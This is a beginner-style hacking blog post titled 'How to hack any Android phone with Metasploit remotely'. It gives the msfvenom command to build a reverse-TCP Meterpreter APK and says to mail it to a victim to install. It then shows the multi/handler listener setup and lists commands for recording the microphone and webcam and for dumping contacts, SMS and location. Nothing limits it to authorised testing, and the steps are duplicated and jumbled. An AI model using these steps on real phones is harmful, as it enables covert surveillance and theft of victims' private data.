Welcome to my first blog!
Today we are going to learn "HOW TO HACK ANY ANDROID PHONE WITH METASPLOIT REMOTELY"
msfvenom is a Kali linux hacking tool for android ,is a combination of
Msfpayload and Msfencode, putting both of these tools into a single
Framework instance known as msfvenom payload.
Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is
enhanced by msfvenom in kali linux.
So, let's get started!!
STEPS :
1. Fire Up kali and open command terminal.
2. Set payload and create custom windows executable.
Command:
1. Fire Up kali and open command terminal.
2. Set payload and create custom windows executable.
Command:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )
Your apk file is being saved in the Home folder.
Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).
3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.
4. Start the metasploit framework console as follows :
Command:
5. Now it's time to open and setup multi-handler. Follows the steps :
6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.
7. Try the following exploit commands :
- record_mic
- webcam_snap
- webcam_stream
- dump_contacts
- dump_sms
- geolocate
Your apk file is being saved in the Home folder.
Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).
3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.
4. Start the metasploit framework console as follows :
Command:
5. Now it's time to open and setup multi-handler. Follows the steps :
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Payload Handler is being started........
6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.
7. Try the following exploit commands :
- record_mic
- webcam_snap
- webcam_stream
- dump_contacts
- dump_sms
- geolocate
************************************************************************
Error fixing(in case you get PARSE ERROR)
Two methods:
1)Type command "d2j-apk-sign andro.apk"
Hope this works... :)
if you have any comments let us hear and problems let us fix! Just comment!
Join us on telegram https://t.me/hax4all
No comments:
Post a Comment